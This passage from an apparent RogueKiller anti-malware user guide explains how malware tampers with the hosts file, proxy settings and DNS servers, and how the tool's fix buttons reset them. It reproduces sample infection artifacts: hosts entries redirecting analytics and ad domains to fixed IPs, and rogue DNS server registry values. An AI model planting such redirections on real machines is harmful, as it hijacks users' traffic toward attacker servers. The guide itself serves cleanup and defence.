style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; (RKReport[#]&lt;span style="font-size: small;"&gt;.txt).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Here's an example of malware hosts section: &lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ HOSTS file: ¤¤¤&lt;br /&gt;
--&amp;gt; C:\Windows\system32\drivers\&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;etc\hosts&lt;br /&gt;&lt;br /&gt;
127.0.0.1 &amp;nbsp; &amp;nbsp; &amp;nbsp; localhost&lt;/span&gt;
&lt;span style="color: #0b5394;"&gt;&lt;br /&gt;
::1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; localhost&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;64.46.36.178 www.google-analytics.com.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;
64.46.36.178 ad-emea.doubleclick.net.&lt;br /&gt;
64.46.36.178 www.statcounter.com.&lt;br /&gt;
64.27.10.42 www.google-analytics.com.&lt;br /&gt;
64.27.10.42 ad-emea.doubleclick.net.&lt;br /&gt;
64.27.10.42 www.statcounter.com.&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;After &lt;i&gt;&lt;b&gt;Hosts Fix&lt;/b&gt;&lt;/i&gt;, here's the new content:&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ HOSTS file: ¤¤¤&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;
--&amp;gt; C:\Windows\system32\drivers\&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;etc\hosts&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;
127.0.0.1 &amp;nbsp; &amp;nbsp; &amp;nbsp; localhost&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/--lMrUv9A_2Y/UIpYToFN8sI/AAAAAAAAAQk/5K0L09akMfs/s1600/hosts.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="481" src="http://4.bp.blogspot.com/--lMrUv9A_2Y/UIpYToFN8sI/AAAAAAAAAQk/5K0L09akMfs/s640/hosts.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Hosts&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;PROXY RAZ&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;The &lt;span style="font-size: small;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Proxy_server"&gt;proxy configuration&lt;/a&gt; &lt;span style="font-size: small;"&gt;is&lt;/span&gt; a &lt;span style="font-size: small;"&gt;&lt;b&gt;web access policy&lt;/b&gt;, allowing to&lt;b&gt; redirect incoming and outgoing int&lt;span style="font-size: small;"&gt;ernet &lt;/span&gt;stream&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;b&gt; to&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; a&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;n IP on a particular port&lt;/b&gt;. This &lt;span style="font-size: small;"&gt;is usually used in an enterprise network, to &lt;b&gt;filter access to the internet&lt;/b&gt; (&lt;span style="font-size: small;"&gt;the proxy is a computer of the network)&lt;/span&gt;, or &lt;span style="font-size: small;"&gt;when we want to &lt;b&gt;filter the internet stream with a software insta&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;lle&lt;span style="font-size: small;"&gt;d&lt;/span&gt; on the computer&lt;/b&gt; (the proxy is then the localhost address&lt;span style="font-size: small;"&gt; - 127.&lt;span style="font-size: small;"&gt;0.0.1:xx)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;.&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;A malware can also use the proxy configuration to filter web accesses,&lt;/b&gt; and then:&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Protect himself &lt;/b&gt;from downloading antivirus softwares (by blocking the corresponding pages and searchs)&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Sniff the internet traffic &lt;/b&gt;(and get passwords, session cookies, ...).&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Redirect user &lt;/b&gt;to malware websites, or on ads.&lt;/li&gt;
&lt;li&gt;...&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
Here's an example of proxy configuration. It's hard to determine if it's legit or not without knowledge of the network architecture of the user. Usually, &lt;b&gt;only the user can determine if he uses or not that kind of proxy&lt;/b&gt;.&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ Registry: 3 ¤¤¤&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;[PROXY IE] HKCU\[...]\Internet Settings : ProxyEnable (1) -&amp;gt; FOUND&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;[PROXY IE] HKCU\[...]\Internet Settings : ProxyServer (10.25.52.205:8080) -&amp;gt; FOUND&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;[PROXY FF] n2aqvo03.default\ 10.25.52.205:8080 -&amp;gt; FOUND&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
Above lines are showing proxy configuration on both &lt;b&gt;Internet Explorer &lt;/b&gt;and &lt;b&gt;Firefox&lt;/b&gt;.&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;If such a configuration is defined, then it will be displayed after a &lt;i&gt;&lt;b&gt;Scan &lt;/b&gt;&lt;/i&gt;in the &lt;i&gt;&lt;b&gt;Proxy tab&lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;, or in the &lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;R&lt;span style="font-size: small;"&gt;e&lt;/span&gt;g&lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;istry &lt;/b&gt;&lt;/i&gt;section of the report. &lt;b&gt;The Proxy Fix button &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;switches every proxy off&lt;/b&gt;&lt;span style="font-size: small;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Once the reset finished, a &lt;b&gt;text report is available&lt;/b&gt; by clicking on the &lt;i&gt;&lt;b&gt;Rep&lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;ort &lt;/b&gt;&lt;/i&gt;button.&lt;/span&gt; It is also available on the desktop&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; (RKReport[#]&lt;span style="font-size: small;"&gt;.txt).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3ycZlL9bVHw/UIpYV0rKLuI/AAAAAAAAAQ4/nTW6z7B1ibA/s1600/proxydns.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="480" src="http://1.bp.blogspot.com/-3ycZlL9bVHw/UIpYV0rKLuI/AAAAAAAAAQ4/nTW6z7B1ibA/s640/proxydns.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Proxy/DNS&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&amp;nbsp;&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;DNS RAZ&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;The &lt;a href="http://en.wikipedia.org/wiki/Domain_Name_System"&gt;DNS configuration&lt;/a&gt; is &lt;b&gt;web access policy&lt;/b&gt;, allowing to &lt;b&gt;redirect the internet st&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;ream to a particular IP&lt;/b&gt;. In a normal use, DNS configuration is used to define the DNS serve&lt;span style="font-size: small;"&gt;r you &lt;span style="font-size: small;"&gt;want &lt;/span&gt;to use to resolve textual names&lt;span style="font-size: small;"&gt; into IPs&lt;/span&gt;&lt;/span&gt;.&lt;/span&gt; Usually, users&lt;span style="font-size: small;"&gt; put &lt;span style="font-size: small;"&gt;the ad&lt;span style="font-size: small;"&gt;dress of a dedicated server of their network, or use the &lt;a href="http://portforward.com/networking/dns.htm"&gt;DNS server of their ISP&lt;/a&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; A DNS server is used to resolve host names &lt;b&gt;(www.google.fr)&lt;/b&gt; into IPs addresses&lt;b&gt; (173.194.67.94)&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
Malwares can modify DNS configuration to &lt;b&gt;redirect host name resolution to a malware server&lt;/b&gt;. By doing so, a malware server &lt;b&gt;can send fake IPs to legit resolution queries&lt;/b&gt;, and fool the user who will be redirected on malware website and be infected with another piece of malware. An example of well known malware is &lt;a href="http://en.wikipedia.org/wiki/DNSChanger"&gt;&lt;i&gt;&lt;b&gt;DNS Changer&lt;/b&gt;&lt;/i&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Here's an example of DNS configuration. &lt;b&gt;RogueKiller does a filtering on IPs with whitelist, &lt;/b&gt;so if a line appears, it has not being identified as legit. Then you have to check on &lt;a href="http://www.geoiptool.com/fr"&gt;which country&lt;/a&gt; &lt;b&gt;the IP points to &lt;/b&gt;and take a decision.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ Registry: 3 ¤¤¤&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;[DNS] HKLM\[...]\ControlSet001\&lt;/span&gt;&lt;br /&gt;
&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;Services\Interfaces\{E3608E44-...} : NameServer (200.13.249.101,200.13.224.&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;254) -&amp;gt; FOUND&lt;br /&gt;
[DNS] HKLM\[...]\ControlSet002\&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;Services\Interfaces\{E3608E44-&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;...} : NameServer (200.13.249.101,200.13.224.&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;254) -&amp;gt; FOUND&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
The above lines are showing a &lt;b&gt;DNS configuration on a single network controller (Interface)&lt;/b&gt;. If a DNS configuration is defined, it will be displayed after a &lt;b&gt;&lt;i&gt;Scan &lt;/i&gt;&lt;/b&gt;in the &lt;i&gt;&lt;b&gt;DNS &lt;/b&gt;&lt;/i&gt;tab, or in the &lt;b&gt;&lt;i&gt;Registry &lt;/i&gt;&lt;/b&gt;section of the report. &lt;b&gt;The DNS Fix button permits to reset the DNS configuration.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Once the reset done, a &lt;b&gt;text report is available&lt;/b&gt; by clicking on the &lt;i&gt;&lt;b&gt;Rep&lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;&lt;b&gt;ort &lt;/b&gt;&lt;/i&gt;button.&lt;/span&gt; It is also available on the desktop&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; (RKReport[#]&lt;span style="font-size: small;"&gt;.txt).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3ycZlL9bVHw/UIpYV0rKLuI/AAAAAAAAAQ4/nTW6z7B1ibA/s1600/proxydns.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="480" src="http://1.bp.blogspot.com/-3ycZlL9bVHw/UIpYV0rKLuI/AAAAAAAAAQ4/nTW6z7B1ibA/s640/proxydns.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Proxy/DNS&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;Shortcut Fix &lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;The Shortcut Fix mode &lt;span style="font-size: small;"&gt;can be&lt;span style="font-size: small;"&gt; used to &lt;b&gt;unhide files/folders/shortcuts that have been hid&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;den&lt;/span&gt; by rogues&lt;/b&gt; called &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;Fake HDD &lt;/i&gt;&lt;/b&gt;(System res&lt;span style="font-size: small;"&gt;tore, File restore&lt;span style="font-size: small;"&gt;, System Fix, ...). A demonstration is available &lt;b&gt;in the following &lt;span style="font-size: small;"&gt;video&lt;/span&gt;&lt;/b&gt;. &lt;span style="font-size: small;"&gt;This mode &lt;span style="font-size: small;"&gt;should not be used at any time, &lt;b&gt;use it only in th&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;at kind of infection&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;!&lt;/b&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;The processing can take time&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;(few minutes)&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;, please be patient&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/_i4tSOn5FkM/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/_i4tSOn5FkM?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed width="600" height="375"  src="http://www.youtube.com/v/_i4tSOn5FkM?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Here's an example of report.&lt;span style="font-size: small;"&gt; &lt;b&gt;It's &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;showing in which director&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;i&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;es hidden items has been found, and restored&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;, a&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;n&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;d how many.&lt;/b&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;The &lt;b&gt;&lt;i&gt;backup &lt;/i&gt;&lt;/b&gt;directory is a special place where &lt;b&gt;Fake HDD malware &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;stores the shortcuts it has moved (Startup menu, quick launch, desktop,&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; ...)&lt;/b&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;The number of item&lt;span style="font-size: small;"&gt;s for this line &lt;span style="font-size: small;"&gt;corresp&lt;span style="font-size: small;"&gt;onds to the numb&lt;span style="font-size: small;"&gt;er of items moved back.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;The &lt;i&gt;&lt;b&gt;Drive &lt;/b&gt;&lt;/i&gt;section &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;shows which drive has been treated or sk&lt;span style="font-size: small;"&gt;ipped.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
